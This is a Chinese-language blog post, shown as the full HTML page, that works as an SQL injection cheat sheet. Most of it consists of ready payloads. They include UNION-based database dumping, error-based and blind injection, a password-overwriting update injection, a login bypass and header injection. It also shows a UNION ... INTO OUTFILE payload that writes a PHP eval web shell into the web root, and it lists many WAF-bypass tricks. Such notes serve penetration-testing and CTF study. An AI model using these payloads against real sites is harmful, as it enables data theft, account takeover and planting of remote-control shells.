<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  
  
  <title>SQL注入 | w1t2f3&#39;s blog</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
  <meta property="og:type" content="article">
<meta property="og:title" content="SQL注入">
<meta property="og:url" content="http://example.com/2023/09/03/sql%E6%B3%A8%E5%85%A5/index.html">
<meta property="og:site_name" content="w1t2f3&#39;s blog">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="http://example.com/2023/09/03/sql%E6%B3%A8%E5%85%A5/sql.jpg">
<meta property="article:published_time" content="2023-09-03T02:26:52.000Z">
<meta property="article:modified_time" content="2023-12-02T13:04:13.525Z">
<meta property="article:author" content="w1t2f3">
<meta property="article:tag" content="技术基础">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://example.com/2023/09/03/sql%E6%B3%A8%E5%85%A5/sql.jpg">
  
    <link rel="alternate" href="/atom.xml" title="w1t2f3's blog" type="application/atom+xml">
  
  
    <link rel="shortcut icon" href="/favicon.png">
  
  
    
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/typeface-source-code-pro@0.0.71/index.min.css">

  
  
<link rel="stylesheet" href="/css/style.css">

  
    
<link rel="stylesheet" href="/fancybox/jquery.fancybox.min.css">

  
  
<meta name="generator" content="Hexo 6.3.0"></head>

<body>
  <div id="container">
    <div id="wrap">
      <header id="header">
  <div id="banner"></div>
  <div id="header-outer" class="outer">
    <div id="header-title" class="inner">
      <h1 id="logo-wrap">
        <a href="/" id="logo">w1t2f3&#39;s blog</a>
      </h1>
      
    </div>
    <div id="header-inner" class="inner">
      <nav id="main-nav">
        <a id="main-nav-toggle" class="nav-icon"><span class="fa fa-bars"></span></a>
        
          <a class="main-nav-link" href="/">Home</a>
        
          <a class="main-nav-link" href="/archives">Archives</a>
        
      </nav>
      <nav id="sub-nav">
        
        
          <a class="nav-icon" href="/atom.xml" title="RSS Feed"><span class="fa fa-rss"></span></a>
        
        <a class="nav-icon nav-search-btn" title="Search"><span class="fa fa-search"></span></a>
      </nav>
      <div id="search-form-wrap">
        <form action="//google.com/search" method="get" accept-charset="UTF-8" class="search-form"><input type="search" name="q" class="search-form-input" placeholder="Search"><button type="submit" class="search-form-submit">&#xF002;</button><input type="hidden" name="sitesearch" value="http://example.com"></form>
      </div>
    </div>
  </div>
</header>

      <div class="outer">
        <section id="main"><article id="post-sql注入" class="h-entry article article-type-post" itemprop="blogPost" itemscope itemtype="https://schema.org/BlogPosting">
  <div class="article-meta">
    <a href="/2023/09/03/sql%E6%B3%A8%E5%85%A5/" class="article-date">
  <time class="dt-published" datetime="2023-09-03T02:26:52.000Z" itemprop="datePublished">2023-09-03</time>
</a>
    
  </div>
  <div class="article-inner">
    
    
      <header class="article-header">
        
  
    <h1 class="p-name article-title" itemprop="headline name">
      SQL注入
    </h1>
  

      </header>
    
    <div class="e-content article-entry" itemprop="articleBody">
      
        <img src="/2023/09/03/sql%E6%B3%A8%E5%85%A5/sql.jpg" class title="图片">

<span id="more"></span>

<h1 id="1-1-sql注入标准流程"><a href="#1-1-sql注入标准流程" class="headerlink" title="1.1 sql注入标准流程"></a>1.1 sql注入标准流程</h1><hr>
<p><strong>1、推测其数据库的大致语法</strong></p>
<p>eg：<code>select * from 某表 where id = ‘xx’ limit 0,1</code></p>
<p><strong>2、通过错误写入让其报错，显示其闭合方式</strong></p>
<p>\ 是转义字符，把后面第一个东西变成字符串</p>
<p>select user,pass from user where id &#x3D; ‘2\‘ limit 0,1 </p>
<p>等价于select user,pass from user where id &#x3D; ‘2’&#39; limit 0,1 </p>
<p>这样闭合错误就会报错！</p>
<p><em>一些常用的闭合方法：</em></p>
<ul>
<li>‘ ’</li>
<li>” “</li>
<li>( )</li>
<li>(‘ ‘)</li>
<li>(“ “)</li>
<li>(( ))</li>
<li>((‘ ‘))</li>
<li>((“ “))</li>
<li><strong>` `</strong></li>
<li>(% %)    #搜索框常见</li>
</ul>
<p><strong>3、验证其闭合方式</strong></p>
<p>例如是 ’ ‘ 闭合，则输入<code>2&#39; --+</code>，若查询成功说明闭合正确</p>
<p>–相当于注释符，+相当于空格，–+会注释掉后面的内容</p>
<p><strong>4、确认有多少列</strong></p>
<p><code>select * from 某表 where id = ‘xx’ order by 5</code></p>
<p><code>select * from 某表 where id = ‘xx’ order by 3</code></p>
<p>当小于或等于其正确数列时，才会查询成功</p>
<p><strong>5、联合查询，显示报错位</strong></p>
<p><code>select * from 某表 where id = ‘-1’ union select 1,2,3 --+</code></p>
<p>使union前查询出错即可，即会显出网站的报错位</p>
<p><strong>6、开始爆库和其他内容</strong></p>
<p><code>-1’ union select 1,database(),3 --+</code>  库</p>
<p><code>-1’ union select 1,version(),3 --+</code>   当前版本</p>
<p><code>-1’ union select 1,user(),3 --+</code>   当前用户</p>
<p><code>-1’ union select 1,@@datadir,3 --+</code>  数据库物理路径</p>
<p><strong>7、爆表</strong></p>
<p>一条一条查：</p>
<p><code>-1’ union select 1,table_name,3 from information_schema.tables where table_schema=&#39;库名&#39; limit 0,1 --+</code></p>
<p>也可以一起查：<br><code>-1’ union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=&#39;库名&#39; --+</code></p>
<p><strong>8、查列</strong></p>
<p><code>-1&#39; union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=&#39;库名&#39; and table_name=&#39;表名&#39; --+</code></p>
<p><strong>9、查字段</strong></p>
<p><code>-1&#39; union select 1,group_concat(列名),3 from 表名 --+</code></p>
<h1 id="1-2-报错注入"><a href="#1-2-报错注入" class="headerlink" title="1.2 报错注入"></a>1.2 报错注入</h1><hr>
<p>当发现数据库除了报错信息外，其他没有任何反应，此时考虑报错注入</p>
<p><code>1&#39; AND (select 1 from (select count(*),concat(0x3a,0x3a,(database()),0x3a,0x3a,floor(rand()*2))a from information_schema.columns group by a)b) --+</code></p>
<p>简单高效的两种：</p>
<p><code>id=1&#39; and extractvalue(1,concat(0x7e,(database()),0x7e)) --+</code></p>
<p><code>id=2&#39; and updatexml(1,concat(0x7e,(database()),0x7e),1) --+</code></p>
<h1 id="1-3-1-布尔盲注"><a href="#1-3-1-布尔盲注" class="headerlink" title="1.3.1 布尔盲注"></a>1.3.1 布尔盲注</h1><hr>
<p>使用情况：这个地方有数据库查询，但是没有显示位，会报错但是不出现信息，错误和正确的页面有区别</p>
<p>id&#x3D;2’ and 0 –+<br>id&#x3D;2’ and 1&lt;2 –+<br>查询成功则说明可以夹带私货</p>
<p>相关小知识：</p>
<p><code>select length(database())</code>计算数据库库名有几个字</p>
<p><code>select substr(database(),1,1)</code>截取数据库库名，从第1个字开始截取1位</p>
<p><code>select ascii(substr(database(),1,1))</code>把这个内容转为ASCII码</p>
<p>操作大致位一个一个字符去查询</p>
<p><code>id=1&#39; and (select ascii(substr(database(),1,1))) &lt; 115 --+</code></p>
<p>走流程：</p>
<p><code>id=1&#39; and (select ascii(substr((select table_name from information_schema.tables where table_schema=&#39;库名&#39; limit 0,1),1,1))) &lt; 115 --+</code></p>
<p>实战时基本都交给sqlmap去操作</p>
<h1 id="1-3-2-布尔时间盲注"><a href="#1-3-2-布尔时间盲注" class="headerlink" title="1.3.2 布尔时间盲注"></a>1.3.2 布尔时间盲注</h1><hr>
<p>使用情况：这个地方有数据库查询，但是没有显示位，也不会出现信息，错误也不会告诉你</p>
<p>相关小知识：</p>
<p>select sleep(5);<br>数完5s后输出一个0</p>
<p><code>select if((select database())=&#39;haha&#39;,sleep(5),null)</code><br>判断一下数据库的库名是否为haha，是就睡5s，不是就不管</p>
<p>实际操作：</p>
<p>1、先判断是否可以睡觉</p>
<p><code>id=1&#39; and sleep(5) --+</code></p>
<p>2、查库</p>
<p><code>id=1&#39; and if((select database())=&#39;库名&#39;,sleep(5),null) --+</code></p>
<p>3、走流程</p>
<p><code>id=1&#39; and if((select substr(table_name,1,1) from information_schema.tables where table_schema=database() limit 0,1)=&#39;e&#39;,sleep(5),null) --+</code></p>
<p>……一般还是交给sqlmap搞定</p>
<h1 id="1-4-Update注入"><a href="#1-4-Update注入" class="headerlink" title="1.4 Update注入"></a>1.4 Update注入</h1><hr>
<p>常见于密码更新sql语句，会更改数据库中所有的密码，危害较大谨慎使用</p>
<p><code>&#39; or 1=1 #</code></p>
<p><code>update users set password=&#39; &#39; or 1=1 # &#39; where username=&#39; admin &#39;</code></p>
<h1 id="1-5-POST注入"><a href="#1-5-POST注入" class="headerlink" title="1.5 POST注入"></a>1.5 POST注入</h1><hr>
<p><em>法一：</em></p>
<p>万能密码：”) or 1&#x3D;1 #</p>
<p><code>select username,password from [表] where username=(&quot; &quot;) or 1=1 # &quot;) and password=(&quot; &quot;) limit 0,1</code></p>
<p><em>法二：</em></p>
<p>使用burpsuite抓包，抓的包送至repeater模块</p>
<p>接着走常规流程</p>
<h1 id="1-6-1-http头注入"><a href="#1-6-1-http头注入" class="headerlink" title="1.6.1 http头注入"></a>1.6.1 http头注入</h1><hr>
<p>一些网站会获取你的User-Agent并记录在他的数据库中</p>
<p>推测其大致sql语句为</p>
<p><code>insert into &#39;security&#39;.&#39;某个表&#39; (uagent,ipadd,username) values(&#39;浏览器信息&#39;,&#39;ip地址&#39;,&#39;用户名&#39;)</code></p>
<p>注入点通常在浏览器信息即User-Agent这块</p>
<p>通常post无法使用注释符，常用<code>and &#39;1&#39;=&#39;1</code>来闭合</p>
<p>实操</p>
<p><code>&#39; and extractvalue(1,concat(0x7e,(select database()),0x7e)) and &#39;1&#39;=&#39;1</code></p>
<p>原句</p>
<p><code>insert into &#39;security&#39;.&#39;某个表&#39; (uagent,ipadd,username) values(&#39;&#39; and extractvalue(1,concat(0x7e,(select database()),0x7e)) and &#39;1&#39;=&#39;1&#39;,&#39;ip地址&#39;,&#39;用户名&#39;)</code></p>
<h1 id="1-6-2-reffer-cookie注入"><a href="#1-6-2-reffer-cookie注入" class="headerlink" title="1.6.2 reffer,cookie注入"></a>1.6.2 reffer,cookie注入</h1><hr>
<p>reffer即来路</p>
<p>两者的注入方式于http注入类似</p>
<h1 id="1-7-宽字节注入"><a href="#1-7-宽字节注入" class="headerlink" title="1.7 宽字节注入"></a>1.7 宽字节注入</h1><hr>
<p>mysql用gbk编码，把2个字符当做一个汉字</p>
<p>%df把\吃掉，因为\进行url编码为%5c，而%df%5c为一个汉字，然而汉字是不会被解析出来的，就会当做一个空格，这样单引号就可以独立出来了</p>
<p><code>id=-2%df&#39;union select 1,2,3 --+</code></p>
<p>如果碰到post类型<br>burp抓包，在目标位置<code>admin%df%27 union select 1,2 # </code><br>把%df%27框起来，右键–convert selection–url—url decode</p>
<p>因为get会自动把数据进行url解码！！！！post不会把数据进行url解码！！！！</p>
<h1 id="1-8-文件相关注入"><a href="#1-8-文件相关注入" class="headerlink" title="1.8 文件相关注入"></a>1.8 文件相关注入</h1><hr>
<p>相关知识：</p>
<p>apache网站位置:&#x2F;var&#x2F;www&#x2F;html;旧版本apache网络位置&#x2F;var&#x2F;www</p>
<p>取出数据并写入文件：<code>select * from 某表 into outfile &quot;文件路径&quot;;</code></p>
<p>显示某个文件：<code>select load_file(“文件路径”);</code></p>
<p>加载某个文件并转存：<code>select load_file(&quot;文件路径&quot;) into outfile (&quot;文件路径&quot;)</code></p>
<p>实操：</p>
<p><code>index.php?id=1&#39;) union select 1,&#39;&lt;?php @eval($_POST[&quot;cmd&quot;]);?&gt;&#39;,3 into outfile &quot;/var/www/html/haha.php&quot; --+</code></p>
<p><code>index.php?id=1&#39;) union select 1,load_file(&quot;c:/flag.txt&quot;),3 into outfile &quot;/var/www/html/haha1.txt&quot; --+</code></p>
<h1 id="2-1-一些绕过waf技巧"><a href="#2-1-一些绕过waf技巧" class="headerlink" title="2.1 一些绕过waf技巧"></a>2.1 一些绕过waf技巧</h1><hr>
<ol>
<li><p>大小写绕过<br>Union SelEcT</p>
</li>
<li><p>双写绕过<br>uniunionon</p>
</li>
<li><p>编码绕过<br>security–》hex<br>urlencode</p>
</li>
<li><p>注释符绕过<br>uni&#x2F;<strong>&#x2F;on sel&#x2F;</strong>&#x2F;ect</p>
</li>
<li><p>空格绕过</p>
<p>替代空格的东西</p>
<p>%09 水平tab键</p>
<p>%0a 新建一行</p>
<p>%0c 新建一页</p>
<p>%0d 回车键</p>
<p>%0b 垂直tab键</p>
<p>%a0 空格键</p>
</li>
<li><p>or and 绕过</p>
</li>
<li><p>单引号</p>
</li>
<li><p>反引号<br>大多数情况下，反引号只能出现在表名，有的时候表名和数据库某个语法语句类似的，否则数据库会误以为是语法<br>select * from`from` where id&#x3D;1</p>
</li>
<li><p>内联注释<br>and &#x2F;<em>!select</em>&#x2F; 1,2</p>
</li>
<li><p>&lt;&gt;绕过<br>un&lt;&gt;ion se&lt;&gt;lect</p>
</li>
</ol>
<p>​	select * from users where id&#x3D;1 and ascii(substr(database(),1,1)) &gt; 115<br>greatest least</p>
<p>​	select * from users where id&#x3D;1 and greatest(ascii(substr(database(),1,1)),115)</p>
<ol start="11">
<li>屏蔽逗号<br>select substr(“xxxxxx”,1,3)<br>select substr(“xxxxxx” from 1 to 3)</li>
</ol>
<p>​	union select 1,2,3;<br>​	union select * from (select 1)a join (select 2)b join (select 3)c;</p>
<p>​	limit 0,1<br>​	limit 0 offset 1</p>
<ol start="12">
<li><p>屏蔽sleep<br>and sleep(1)<br>and benchmark(10000000000,1)</p>
</li>
<li><p>group_concat屏蔽<br>select group_concat(“haha”,”nihao”)<br>select concat_ws(“”,”haha”,”nihao”)</p>
</li>
<li><p>等号屏蔽<br>like rlike regexp &lt;&gt;<br>id&#x3D;1’ or 1 like 1<br>id&#x3D;1’ or 1 &lt;&gt; 1</p>
</li>
<li><p>post情况屏蔽#<br>id&#x3D;3”) or 1&#x3D;1 – a</p>
</li>
<li><p>ip地址拦截<br>X-Forwarded-For:<br>X-remote-IP<br>X-Originating-IP<br>X-remote-addr<br>X-Real-IP</p>
</li>
<li><p>修改静态资源<br><a target="_blank" rel="noopener" href="http://www.xxx.com/sql.php?id=1">www.xxx.com/sql.php?id=1</a><br>可以替换为<br><a target="_blank" rel="noopener" href="http://www.xxx.com/sql.php/1.js?id=1">www.xxx.com/sql.php/1.js?id=1</a></p>
</li>
<li><p>url白名单绕过<br>为了防止防火墙误伤，会设置白名单&#x2F;admin.php manager system</p>
</li>
</ol>
<p>​	<a target="_blank" rel="noopener" href="http://www.xxx.com/sql.php?id=1">www.xxx.com/sql.php?id=1</a><br>​	<a target="_blank" rel="noopener" href="http://www.xxx.com/sql.php/admin.php?id=1">www.xxx.com/sql.php/admin.php?id=1</a><br>​	<a target="_blank" rel="noopener" href="http://www.xxx.com/sql.php?xxxx=/manager/&b=%E6%94%BB%E5%87%BB%E4%BB%A3%E7%A0%81">www.xxx.com/sql.php?xxxx=/manager/&amp;b=攻击代码</a><br>​	<a target="_blank" rel="noopener" href="http://www.xxx.com/sql.php?id=1">www.xxx.com/../../../../manager/../../../sql.php?id=1</a></p>
<ol start="19">
<li><p>爬虫白名单<br>伪造自己是搜索引擎（修改ua）</p>
</li>
<li><p>数据库注释执行<br>&#x2F;<em>!50001 select * from users</em>&#x2F;<br>如果数据库是5.00.01以下的才会执行</p>
</li>
<li><p>增加干扰<br>union all %23%a0 select 1,2,3</p>
</li>
</ol>

      
    </div>
    <footer class="article-footer">
      <a data-url="http://example.com/2023/09/03/sql%E6%B3%A8%E5%85%A5/" data-id="clpo2t75j0006ugf14nbr23gm" data-title="SQL注入" class="article-share-link"><span class="fa fa-share">Share</span></a>
      
      
      
  <ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/%E6%8A%80%E6%9C%AF%E5%9F%BA%E7%A1%80/" rel="tag">技术基础</a></li></ul>

    </footer>
  </div>
  
    
<nav id="article-nav">
  
    <a href="/2023/09/04/markdown%E5%9F%BA%E6%9C%AC%E8%AF%AD%E6%B3%95/" id="article-nav-newer" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Newer</strong>
      <div class="article-nav-title">
        
          markdown基本语法
        
      </div>
    </a>
  
  
    <a href="/2023/08/30/hexo%E7%9B%B8%E5%85%B3/" id="article-nav-older" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Older</strong>
      <div class="article-nav-title">hexo相关</div>
    </a>
  
</nav>

  
</article>


</section>
        
          <aside id="sidebar">
  
    

  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Tags</h3>
    <div class="widget">
      <ul class="tag-list" itemprop="keywords"><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E5%BA%94%E7%94%A8%E5%AE%9E%E8%B7%B5/" rel="tag">应用实践</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E6%8A%80%E6%9C%AF%E5%9F%BA%E7%A1%80/" rel="tag">技术基础</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Tag Cloud</h3>
    <div class="widget tagcloud">
      <a href="/tags/%E5%BA%94%E7%94%A8%E5%AE%9E%E8%B7%B5/" style="font-size: 10px;">应用实践</a> <a href="/tags/%E6%8A%80%E6%9C%AF%E5%9F%BA%E7%A1%80/" style="font-size: 20px;">技术基础</a>
    </div>
  </div>

  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Archives</h3>
    <div class="widget">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2023/12/">December 2023</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2023/10/">October 2023</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2023/09/">September 2023</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2023/08/">August 2023</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Recent Posts</h3>
    <div class="widget">
      <ul>
        
          <li>
            <a href="/2023/12/02/%E7%AE%80%E6%98%93%E8%BF%9C%E7%A8%8B%E6%8E%A7%E5%88%B6%E7%A8%8B%E5%BA%8F/">简易控制程序</a>
          </li>
        
          <li>
            <a href="/2023/12/02/python_socket/">Python网络编程</a>
          </li>
        
          <li>
            <a href="/2023/10/24/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E/">文件上传漏洞</a>
          </li>
        
          <li>
            <a href="/2023/10/17/haha/">haha</a>
          </li>
        
          <li>
            <a href="/2023/10/17/A-Test/">A Test</a>
          </li>
        
      </ul>
    </div>
  </div>

  
</aside>
        
      </div>
      <footer id="footer">
  
  <div class="outer">
    <div id="footer-info" class="inner">
      
      &copy; 2023 w1t2f3<br>
      Powered by <a href="https://hexo.io/" target="_blank">Hexo</a>
    </div>
  </div>
</footer>

    </div>
    <nav id="mobile-nav">
  
    <a href="/" class="mobile-nav-link">Home</a>
  
    <a href="/archives" class="mobile-nav-link">Archives</a>
  
</nav>
    


<script src="/js/jquery-3.6.4.min.js"></script>



  
<script src="/fancybox/jquery.fancybox.min.js"></script>




<script src="/js/script.js"></script>





  </div>
</body>
</html>